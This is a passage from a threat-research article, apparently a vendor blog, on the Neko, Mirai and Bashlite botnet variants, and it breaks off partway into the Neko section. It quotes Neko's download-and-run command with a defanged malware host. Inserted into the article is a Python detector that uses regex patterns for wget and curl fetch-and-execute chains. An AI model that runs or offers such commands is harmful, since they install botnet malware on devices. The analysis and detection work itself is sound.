Back-to-Back Campaigns: Neko, Mirai, and Bashlite Malware Variants Use Various Exploits to Target Several Routers, Devices


By Augusto Remillano II and Jakub Urbanec


Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers into botnets that are capable of launching distributed denial of service (DDoS) attacks.


Neko


On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. It then issues the following commands:



“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”



Our research indicates that this botnet has versions for various processor architectures.
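The command chain above (change into a world-writable staging directory, fetch a binary, make it executable, run it) is a pattern defenders can look for in honeypot or shell-audit logs regardless of which botnet family drops the payload. The following detector is an added example and is not part of the original article or of any Trend Micro tooling; the log lines are constructed, the source addresses are documentation-range placeholders, and only the first line reproduces the download host reported above.

```python
import re
from dataclasses import dataclass

# Constructed sample log: "<timestamp> <source-ip> <shell command>" per line.
# The first entry reproduces the chain reported in the article (hxxp is the
# defanged form of http); the others are benign or partial chains.
SAMPLE_LOG = [
    "2019-07-22T10:01:13Z 203.0.113.7 cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko",
    "2019-07-22T10:02:40Z 203.0.113.9 cd /var/log; ls -la",
    "2019-07-22T10:03:05Z 203.0.113.11 curl -O hxxp://192.0.2.10/update.sh; sh update.sh",
    "2019-07-22T10:04:51Z 203.0.113.12 wget hxxp://192.0.2.20/readme.txt",
]

# Indicators of the drop-and-execute chain. Each regex is a hypothetical
# heuristic chosen for this example, not a signature from the article.
STAGING_RE = re.compile(r"\bcd\s+(?:/tmp|/var/tmp|/dev/shm)\b")
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
# chmod with an execute bit: octal containing a 7, or symbolic +x.
CHMOD_RE = re.compile(r"\bchmod\s+(?:[0-7]*7[0-7]*|[ugoa]*\+[rwx]*x[rwx]*)\s")
# Execution of a local file right after a separator (./bin, sh file, bash file).
EXEC_RE = re.compile(r"(?:^|;|&&|\|\|)\s*(?:\./\S+|sh\s+\S+|bash\s+\S+)")
URL_RE = re.compile(r"\b(?:hxxps?|https?|ftp|tftp)://([^/\s]+)")


@dataclass
class Finding:
    timestamp: str
    source: str
    verdict: str
    indicators: list
    url_hosts: list


def analyze_command(cmd: str) -> list:
    """Return the ordered list of chain indicators present in one command line."""
    indicators = []
    if STAGING_RE.search(cmd):
        indicators.append("cd_staging_dir")
    if FETCH_RE.search(cmd):
        indicators.append("remote_fetch")
    if CHMOD_RE.search(cmd):
        indicators.append("chmod_exec")
    if EXEC_RE.search(cmd):
        indicators.append("exec_downloaded")
    return indicators


def classify(indicators: list) -> str:
    """Fetch followed by execution is the full chain; fetch alone is a lesser signal."""
    if "remote_fetch" in indicators and "exec_downloaded" in indicators:
        return "drop_and_execute"
    if "remote_fetch" in indicators:
        return "download_only"
    return "benign"


def scan_log(lines: list) -> list:
    """Parse each log line and produce a Finding with verdict and extracted hosts."""
    findings = []
    for line in lines:
        timestamp, source, cmd = line.split(" ", 2)
        indicators = analyze_command(cmd)
        findings.append(Finding(timestamp, source, classify(indicators),
                                indicators, URL_RE.findall(cmd)))
    return findings


def collect_hosts(findings: list) -> set:
    """Hosts seen in confirmed drop-and-execute chains, for review and blocklisting."""
    return {h for f in findings if f.verdict == "drop_and_execute" for h in f.url_hosts}


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f.timestamp, f.source, f.verdict, f.indicators, f.url_hosts)
    print("download hosts in full chains:", sorted(collect_hosts(results)))
```

The verdict separates a complete fetch-and-run chain from a bare download so that analysts can prioritise; the hosts extracted from complete chains are the ones worth pivoting on, since they are where the bot binaries for each architecture are served.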


Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands: it can execute shell commands as well as launch User Datagram Protocol (UDP) and UDP-HEX flood attacks, overwhelming a router’s ability to properly process and respond to legitimate traffic.


It is also capable of killing processes (the “killer” function is found in its body). Neko also carries an extensive kill list of processes associated with other malware, which it terminates to remove competing bots from the device.


Further examination of the Neko botnet code shows that it comes with scanners that are capable of looking for multiple exploits that would allow the malware to propagate itself to other vulnerable devices:


Aside from the abovementioned exploits, we observe ..
